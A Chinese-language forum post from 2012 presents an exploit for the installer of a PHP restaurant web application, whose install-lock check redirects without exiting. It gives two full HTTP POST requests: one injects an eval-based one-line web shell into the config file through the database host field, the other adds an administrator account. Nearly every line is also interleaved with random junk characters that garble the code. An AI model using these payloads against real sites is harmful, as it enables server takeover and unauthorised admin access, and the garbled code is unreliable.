问题出在/install/index.php文件。在程序安装完后,会在程序根目录下生成install.lock文件。而/install/index.php在判断是否有install.lock时出现错误。
- n0 X U4 }- z7 F, V! f+ w. }
3 U4 c$ b) k, J! c: L<?php
' V( |$ l; n& {if(file_exists("../install.lock"))9 Q a$ M# I3 T/ ?9 Z6 r
{
0 K4 @3 o% N% I7 i7 i. k header("Location: ../");//没有退出; ?) R6 B7 K+ R3 H) G+ }9 `( {
}
) _# H8 @6 r1 }" \6 k& |
* k: R6 q s, m: }9 R//echo 'tst';exit;: C; A! A) k, p4 R# I/ Q
require_once("init.php");
8 O8 G( i& v& n0 cif(empty($_REQUEST['step']) || $_REQUEST['step']==1)/ W% I% m0 g h( f9 |# V: [/ w
{
( C w$ B' |3 j0 D g! q# N) a可见在/install/index.php存在时,只是header做了302重定向并没有退出,也就是说下面的逻辑还是会执行的。在这里至少可以产生两个漏洞。# @9 J- q' A7 z% T( R0 \4 v# n1 k
- i. l. h2 {! I* i3 E
1、getshell(很危险) C# @9 _$ U [
if(empty($_REQUEST['step']) || $_REQUEST['step']==1)
( v; a- \3 c1 b/ D) P0 @! s `{
9 u9 y; f$ A1 X! y2 Q$smarty->assign("step",1); g9 k0 L* K' ~* C4 N
$smarty->display("index.html");
* Q3 u3 e+ k2 k}elseif($_REQUEST['step']==2). O/ \1 W3 B4 g, X
{8 v, S8 ^2 [. ?/ P+ L
$mysql_host=trim($_POST['mysql_host']);
. p! z {$ J3 ?+ q% Q+ ^ $mysql_user=trim($_POST['mysql_user']);
! l( I" v; U" B0 @ j* w+ Y3 T $mysql_pwd=trim($_POST['mysql_pwd']);/ c( K. `, i2 o* s2 l
$mysql_db=trim($_POST['mysql_db']);. ~* j, k9 V1 C' N$ |! u! x
$tblpre=trim($_POST['tblpre']);
6 u) D; Z3 \8 J% M3 Z8 ]4 U4 p F! n $domain==trim($_POST['domain']);
& {# T9 B( ^% L$ r Q $str="<?php \r\n";$ _2 L; W" h1 l/ Y$ l0 v8 s" `, u3 b
$str.='define("MYSQL_HOST","'.$mysql_host.'");'."\r\n";
6 G# E& z1 a3 ~2 F9 I1 w# S, I $str.='define("MYSQL_USER","'.$mysql_user.'");'."\r\n";
! Y7 U9 N8 p( R6 y) q $str.='define("MYSQL_PWD","'.$mysql_pwd.'");'."\r\n";
5 u% P3 p& p- L* T' a. {- M $str.='define("MYSQL_DB","'.$mysql_db.'");'."\r\n";. W, z% @! q7 Q1 [- L- _
$str.='define("MYSQL_CHARSET","GBK");'."\r\n";
2 K6 Z, Q$ G8 N+ u- n5 O $str.='define("TABLE_PRE","'.$tblpre.'");'."\r\n";% r. \' q, n/ L# N. {; F8 }% C8 R- N
$str.='define("DOMAIN","'.$domain.'");'."\r\n";
/ r/ _4 G* [* t: |; C4 R" D $str.='define("SKINS","default");'."\r\n";, Z' G4 s4 X0 N6 u
$str.='?>';
, S8 F! y; V: V$ Y; u* U+ g& Q file_put_contents("../config/config.inc.php",$str);//将提交的数据写入php文件. a( }' x- z) e
上面的代码将POST的数据直接写入了../config/config.inc.php文件,那么我们提交如下POST包,即可获得一句话木马 T- J) R# c: L; A/ H
POST /canting/install/index.php?m=index&step=2 HTTP/1.1
4 d7 j, ^# A: Z1 ?8 Q( _3 ]Host: 192.168.80.129
& a5 U" o+ u3 I& _9 WUser-Agent: Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/17.0 Firefox/17.08 s7 E/ S; p4 W: |3 [. c& y6 l: `' w! V
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
N U) D$ Q0 j$ w3 g) ], RAccept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
( N1 F" j ?* WAccept-Encoding: gzip, deflate k. D8 z: u b1 L6 g% p
Referer: http://192.168.80.129/canting/install/index.php?step=1: z. k0 j) i3 u2 i3 @* [" [
Cookie: ck_ss_id=1354023211djfa6ggefdifvoa3kvhi61sc42; PHPSESSID=djfa6ggefdifvoa3kvhi61sc42: t l% d! i9 @% f2 A
Content-Type: application/x-www-form-urlencoded, D8 E. n: o' z" {# R8 r
Content-Length: 126" S/ `% W$ _3 }* o7 N" U
$ A) Z6 i. S' q( Z$ K5 Emysql_host=test");@eval($_POST[x]);?>//&mysql_user=1&mysql_pwd=2&mysql_db=3&tblpre=koufu_&domain=www&button=%CF%C2%D2%BB%B2%BD
! i, |: s; H5 L+ E, R& K3 d% p% n& N R但是这个方法很危险,将导致网站无法运行。
1 t1 v" D0 L7 Y! P) Y" }1 a6 T x3 t8 M7 B3 G4 y. `8 B6 G* M
2、直接添加管理员8 J4 v6 {+ t5 |* M e" x& K" g
/ r, Z' [. x% C9 D% I3 x5 ~7 }/ Q7 c
elseif($_REQUEST['step']==5)8 ]) i i4 S7 U$ O! X4 \8 h
{2 w0 [. N4 Y" Y6 i7 d+ [$ a& c
if($_POST)& B3 P% U0 ~8 j7 D
{ require_once("../config/config.inc.php");% E6 k e6 U! q s! {: D; Q% x/ u
$link=mysql_connect(MYSQL_HOST,MYSQL_USER,MYSQL_PWD);+ ?. z/ Q* t4 h9 I7 x$ E
mysql_select_db(MYSQL_DB,$link);
8 W6 n4 U, i. u" t mysql_query("SET NAMES ".MYSQL_CHARSET );
8 a& E6 a4 [ M/ N7 ^+ D mysql_query("SET sql_mode=''");
5 F$ X. ]7 L, m/ j
: r X! Y8 c3 s v $adminname=trim($_POST['adminname']);) H: w# Y0 ~* h& b
$pwd1=trim($_POST['pwd1']);5 @% n* k9 {; @/ m/ a
$pwd2=trim($_POST['pwd2']);; j M4 u# c. c
if(empty($adminname))
1 [/ K+ s( z7 {6 U' X) u- m) ?* O {
" A$ J3 m/ m* y) [8 K7 M+ D* u ]3 g" N3 ?
echo "<script>alert('管理员不能为空');history.go(-1);</script>";
( ?8 b+ |; P h0 Q3 B' I exit();) o: e& |5 n" k$ L/ q( u$ A5 n, ~
}+ x5 Y. X1 Q1 o$ e
if(($pwd1!=$pwd2) or empty($pwd1))1 l) l4 i8 X1 r& V5 }/ k6 K
{* Q6 P# {0 _$ S0 w0 J9 Q. `, S- x
echo "<script>alert('两次输入的密码不一致');history.go(-1);</script>";//这里也是没有退出1 |2 x `. q) B$ O# s
}& B' n- y3 D+ g0 R* ?2 m
mysql_query("insert into ".TABLE_PRE."admin(adminname,password,isfounder) values('$adminname','".umd5($pwd1)."',1)");//直接可以插入一个管理员6 q( t6 ?- P; Y0 e% x
}
8 O k O# C( o" l+ o这样的话我们就可以直接插入一个qingshen/qingshen的管理员帐号,语句如下:& m4 C9 u8 d; Y+ x! o) N6 r& s& a
POST /canting/install/index.php?m=index&step=5 HTTP/1.19 L8 _" ~/ i4 m
Host: 192.168.80.1299 v9 e. g# h1 }9 z& d
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/17.0 Firefox/17.0
6 K6 L; E3 s3 @Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8+ R; [1 a2 e/ ^* L
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
7 w; l* J3 I" b$ h/ R1 `, tAccept-Encoding: gzip, deflate' n3 U7 e* @ Z+ R9 n8 D* C
Referer: http://www.2cto.com /canting/install/index.php?step=1
, t4 {6 T' p- g0 J6 VCookie: ck_ss_id=1354023211djfa6ggefdifvoa3kvhi61sc42; PHPSESSID=djfa6ggefdifvoa3kvhi61sc42
) L9 V7 @& N4 P5 Q% R. gContent-Type: application/x-www-form-urlencoded7 y1 S& M. L2 ]7 `
Content-Length: 461 A5 w7 N. E1 M
. o' e- d F; R! p
adminname=qingshen&pwd1=qingshen&pwd2=qingshen
& s2 ?3 @! b; H3 [ |
发表于 2012-12-4 11:13:44
收藏
支持
反对